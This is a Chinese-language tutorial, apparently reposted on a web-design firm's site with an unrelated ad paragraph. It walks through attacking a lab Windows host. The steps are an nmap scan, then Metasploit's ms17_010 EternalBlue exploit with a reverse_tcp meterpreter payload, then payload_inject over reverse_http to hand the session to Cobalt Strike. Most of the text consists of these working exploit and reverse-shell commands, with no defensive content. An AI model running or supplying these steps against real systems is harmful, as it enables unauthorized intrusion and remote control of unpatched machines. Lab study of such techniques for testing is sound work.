如何进行MSF和CobaltStrike联动
本篇文章为大家展示了如何进行MSF和CobaltStrike联动,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。
为大英等地区用户提供了全套网页设计制作服务,及大英网站建设行业解决方案。主营业务为网站设计、网站建设、大英网站设计,以传统方式定制建设网站,并提供域名空间备案等一条龙服务,秉承以专业、用心的态度为用户提供真诚的服务。我们深信只要达到每一位用户的要求,就会得到认可,从而选择与我们长期合作。这样,我们也可以走得更远!
0x00环境介绍
攻击机:192.168.60.129 (kali)
受害机:192.168.60.131
网关:192.168.60.2
工具:nmap、metaspolit、cobaltstrike
0x01攻击准备
首先部署受害主机调制网卡可以互相通信。
接下来部署web应用服务,搞的看起来像是真实的应用服务器一样哈
0x02前攻击阶段
通过使用nmap信息收集发现开放端口445、3389及操作系统版本信息。
nmap -A 192.168.60.131
通过信息收集发现系统开放445端口,使用工具检测是否存在ms17_010漏洞,发现存在。
接近着神器1 Metaspolit上场
首先打开msf,进行漏洞利用
1.搜索利用漏洞模块
search ms17_010
2.漏洞利用
use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp set RHOST 192.168.60.131 set LHOST 192.168.60.129
获得session
进入meterpreter会话。
接近着神器2Cobaltstrike上场
如果觉得功能太少,也可以和Cobaltstrike联动
启动Cobaltstrike
现在获得是一个MSF的meterpreter类型的session,且session id为1
在Cobaltstrike新建一个监听,配置如下:
在MSF中设置如下
use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http set DisablePayloadHandler true set lhost 192.168.60.129 set lport 12388 set session 1
exploit
这样就可以看到在Cobaltstrike中获取到了了MSF弹回的Meterpreter会话。
最后可以使用Cobaltstrike中集成的渗透模块进行进一步的测试。
注:只有Meterpreter类型的session才能派生给Cobaltstrike。
上述内容就是如何进行MSF和CobaltStrike联动,你们学到知识或技能了吗?如果还想学到更多技能或者丰富自己的知识储备,欢迎关注创新互联行业资讯频道。
分享标题:如何进行MSF和CobaltStrike联动
当前网址:http://azwzsj.com/article/jipghp.html